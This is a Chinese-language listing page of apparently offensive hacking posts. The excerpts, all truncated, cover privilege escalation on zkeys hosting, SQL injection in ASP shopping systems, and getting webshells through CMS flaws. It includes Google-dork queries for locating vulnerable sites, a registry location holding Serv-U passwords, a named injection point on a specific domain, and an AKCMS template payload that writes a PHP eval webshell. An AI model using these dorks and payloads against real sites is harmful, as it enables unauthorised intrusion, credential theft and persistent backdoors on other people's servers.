-
zkysoft 主机提权方法
zkeys 默认网站用户权限很低,大部分exp都用不了,如 iis6 exp 就提示无法设置注册表。提供我成功过的几个方法(不一定有效):1、如果目标仅仅是旁站的话可以去注册表查 serv-u 的指定用户密码,注册表地址:HKEY_LOCA...
-
渗透库巴购物
先来几个跨站反弹的存储的google hack看到这个:体力活找到这个:BT下跑了下二级域名,尝试加/eweb/,直到找到一个域名能解析aspx,根据前面源码里爆出来的用户,密码登录,修改格式:获取webshell,发现几乎所有的数据库连接...
-
AKCMS注入及后台拿shell漏洞
模板中写入以下内 <{php}>fputs(fopen(“./0x80c.php”,”w”),”<?eval($_POST[0x80c]);?>&rdqu...
-
无忧购物系统ASP专业版注入漏洞
谷歌关键字:inurl:views.asp?hw_id=注入点:www.hack1990.com/views.asp?hw_id=512POST 注入漏洞...
-
szwyadmin程序漏洞拿shell
先我们在Google中搜索关键词关键字:inurl:szwyadmin/login.asp任意打开一个搜索结果,打开登录界面后在地址栏中输入下面的代码:代码:javascript:alert(document.cookie="ad...
